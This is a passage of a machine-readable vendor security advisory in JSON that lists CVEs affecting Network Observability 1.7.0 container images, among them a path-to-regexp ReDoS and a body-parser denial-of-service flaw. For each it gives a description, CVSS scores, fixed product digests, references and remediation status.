"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "serve-static: Improper Sanitization in serve-static"
},
{
"cve": "CVE-2024-45296",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2024-09-09T19:20:18.127723+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310908"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "path-to-regexp: Backtracking regular expressions cause ReDoS",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45296"
},
{
"category": "external",
"summary": "RHBZ#2310908",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310908"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f",
"url": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6",
"url": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j",
"url": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j"
}
],
"release_date": "2024-09-09T19:15:13.330000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "path-to-regexp: Backtracking regular expressions cause ReDoS"
},
{
"cve": "CVE-2024-45590",
"cwe": {
"id": "CWE-405",
"name": "Asymmetric Resource Consumption (Amplification)"
},
"discovery_date": "2024-09-10T16:20:29.292154+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311171"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "body-parser: Denial of Service Vulnerability in body-parser",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
